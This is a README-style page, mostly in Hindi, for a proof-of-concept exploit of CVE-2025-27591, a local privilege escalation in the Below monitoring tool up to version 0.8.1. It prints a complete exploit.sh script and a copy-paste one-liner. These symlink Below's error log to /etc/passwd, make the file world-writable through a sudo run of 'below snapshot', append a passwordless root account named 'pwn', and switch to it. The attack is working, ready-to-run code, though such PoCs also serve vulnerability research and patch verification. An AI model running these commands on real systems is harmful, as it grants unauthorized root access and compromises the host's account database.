
Below v0.8.1 - स्थानीय विशेषाधिकार वृद्धि (CVE-2025-27591) - PoC एक्सप्लॉइट
Below <= v0.8.1
सर्व-लेखन-योग्य लॉग सिमलिंक के माध्यम से स्थानीय विशेषाधिकार वृद्धि
PoC एक्सप्लॉइट
Below संस्करण <= 0.8.1 में एक गंभीर स्थानीय विशेषाधिकार वृद्धि भेद्यता (CVE-2025-27591) मौजूद है।
गलत कॉन्फ़िगर की गई सर्व-लेखन-योग्य लॉग निर्देशिका (/var/log/below/) और Rust कोडबेस में असुरक्षित अनुमति तर्क के कारण, एक स्थानीय हमलावर error_<user>.log को /etc/passwd जैसी किसी भी रूट-स्वामित्व वाली फ़ाइल से सिमलिंक कर सकता है।
जब below snapshot को sudo के साथ निष्पादित किया जाता है, तो यह जबरन लॉग फ़ाइल पर मोड 0666 सेट करता है और उसमें लिखता है—भले ही वह एक सिमलिंक हो।
यह बिना पासवर्ड के root-विशेषाधिकार प्राप्त उपयोगकर्ता के इंजेक्शन की अनुमति देता है, जिससे पूर्ण रूट शेल पहुंच प्राप्त होती है।
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh
या
एक्सप्लॉइट कोड
# Title : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
# Author : Ravindu Wickramasinghe (aka rvz)
# Usage : usage: ./exploit.sh
u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry to /etc/passwd (now writable)
su pwn
नोट: IppSec ने अपने वॉकथ्रू में exploit.sh के बजाय one-liner का उपयोग किया, उसके बाद exploit.sh को README.md में जोड़ा गया। सोचा कि यह सभी के लिए आसान होगा। धन्यवाद IppSec. ^^
या
One-liner - (कॉपी करें, पेस्ट करें और निष्पादित करें)
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
sudo समूह में उपयोगकर्ता जिसके पास /usr/bin/below * तक NOPASSWD पहुंच हैMatthias Gerstner @ SUSE द्वारा खोजा और रिपोर्ट किया गया - सुरक्षा सलाह
PoC एक्सप्लॉइट - Ravindu Wickramasinhge उर्फ rvz